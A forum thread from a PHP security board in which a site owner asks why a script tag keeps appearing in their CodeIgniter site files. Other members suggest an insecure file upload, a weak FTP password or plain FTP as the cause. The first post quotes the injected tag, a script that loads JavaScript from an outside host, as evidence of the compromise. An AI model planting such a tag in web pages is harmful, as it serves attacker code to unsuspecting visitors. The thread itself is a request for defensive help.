script tag inserted

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
junjustkim
Forum Commoner
Posts: 44
Joined: Thu May 22, 2008 8:48 pm

script tag inserted

Post by junjustkim »

hi to all

I am using codeigniter framework for my website and hosted on shared hosting server. Most of my index.php, home.php, index.html and other .js, at the end of the file there was inserted script like below, it was using different value on src="" . Is this the Cross-site scripting? How they inject to my file? I used 755 as file permission. How to prevent this because I've encounterd this twice. Even I replaced all files it will attack again. Additionally, not only one domain is being attack almost all hosted on that server.


<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--11428cb2b3b67368730c012cb53eb247-->
User avatar
timWebUK
Forum Contributor
Posts: 239
Joined: Thu Oct 29, 2009 6:48 am
Location: UK

Re: script tag inserted

Post by timWebUK »

Change your FTP password to something more secure - more than 8 characters, upper case, lower case, integers and symbols.
junjustkim
Forum Commoner
Posts: 44
Joined: Thu May 22, 2008 8:48 pm

Re: script tag inserted

Post by junjustkim »

hi timWebUK,

Thanks for your immediate replied. I already change my ftp password, but hacker still attacked my site. To all the expert please give me an advise or any suggestion to protect my site. I don't know what to do. I already report it on the technical support of my hosting but they said that there is something wrong with my code.

Please help me


Thanks
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: script tag inserted

Post by kaisellgren »

Use SSH when transferring files to the server.

You might have a vulnerability in your application. It's hard to guess. Are you doing any sort of file uploading on your site?
junjustkim
Forum Commoner
Posts: 44
Joined: Thu May 22, 2008 8:48 pm

Re: script tag inserted

Post by junjustkim »

hi kaisellgren,

At first, thank you for your help and suggestion. Does any one knows how the hacker could inserted this script? Any thought about this?

I have file uploading to mysite.


Thanks
Tirso
User avatar
timWebUK
Forum Contributor
Posts: 239
Joined: Thu Oct 29, 2009 6:48 am
Location: UK

Re: script tag inserted

Post by timWebUK »

junjustkim wrote: I have file uploading to mysite.
Chances are your file upload is insecure and they are exploiting it. If you post your code, we may be able to assist.
User avatar
Ragnis
Forum Commoner
Posts: 31
Joined: Thu Nov 13, 2008 12:35 pm
Location: Saaremaa, Estonia, Europe, Asia, Planet Earth, The Solar System, Milky way.

Re: script tag inserted

Post by Ragnis »

Very likely teh hacker just uploaded a php file and then executed it by going to yourdomain.com/files/hackerfile.php.

To prevent futher attacks you should put some kind of file extension check to your upload.
Post Reply